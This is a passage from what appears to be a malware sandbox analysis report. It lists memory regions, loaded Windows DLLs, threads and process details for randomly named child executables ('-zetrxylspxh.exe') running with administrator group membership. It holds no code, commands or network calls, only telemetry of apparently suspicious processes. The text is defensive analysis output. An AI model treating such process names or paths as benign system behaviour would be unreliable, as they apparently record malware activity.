"c:\\windows\\system32\\ntdll.dll") Region: id = 3832 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 3838 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 3839 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3840 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3841 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3842 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3843 start_va = 0x570000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3860 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3861 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3862 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3863 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3864 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3946 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3947 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3948 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3949 start_va = 0x570000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3950 start_va = 0x6f0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 3951 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 3952 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3953 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 3954 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 3955 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3956 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3957 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3958 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3959 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3976 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3977 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3978 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3979 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3980 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3981 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 3982 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 3983 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 3984 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4145 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 4189 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4190 start_va = 0x7f0000 end_va = 0x977fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 4191 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 108 os_tid = 0x1258 Thread: id = 114 os_tid = 0x1290 Process: id = "22" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xd5b3000" os_pid = "0xc54" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3844 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3845 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3846 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3847 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3848 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3849 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3850 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3851 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3852 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3853 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 3854 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3855 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3856 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3857 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3858 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3859 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 3918 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3919 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3920 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3921 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3922 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3923 start_va = 0x550000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 3924 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3941 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3942 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3943 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3944 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3945 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4096 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4097 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4098 start_va = 0x6d0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 4099 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 4100 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4101 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 4102 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 4103 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4120 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4121 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4122 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4123 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4124 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4125 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4126 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4127 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4128 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4484 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 4501 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 4502 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 4503 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4504 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 4505 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4506 start_va = 0x7d0000 end_va = 0x957fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 4507 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 109 os_tid = 0x1298 Thread: id = 121 os_tid = 0x9c4 Process: id = "23" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x4c1b8000" os_pid = "0x890" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3875 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3876 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3877 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3878 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3879 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3880 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3881 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3882 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3883 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3884 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 3885 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3886 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3887 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3888 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3889 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3890 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 4001 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 4002 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4003 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4004 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4005 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4006 start_va = 0x440000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 4007 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4008 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4025 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4026 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4027 start_va = 0x5c0000 end_va = 0x67dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4256 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4257 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4258 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 4259 start_va = 0x4c0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 4260 start_va = 0x680000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 4261 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 4278 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4279 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = 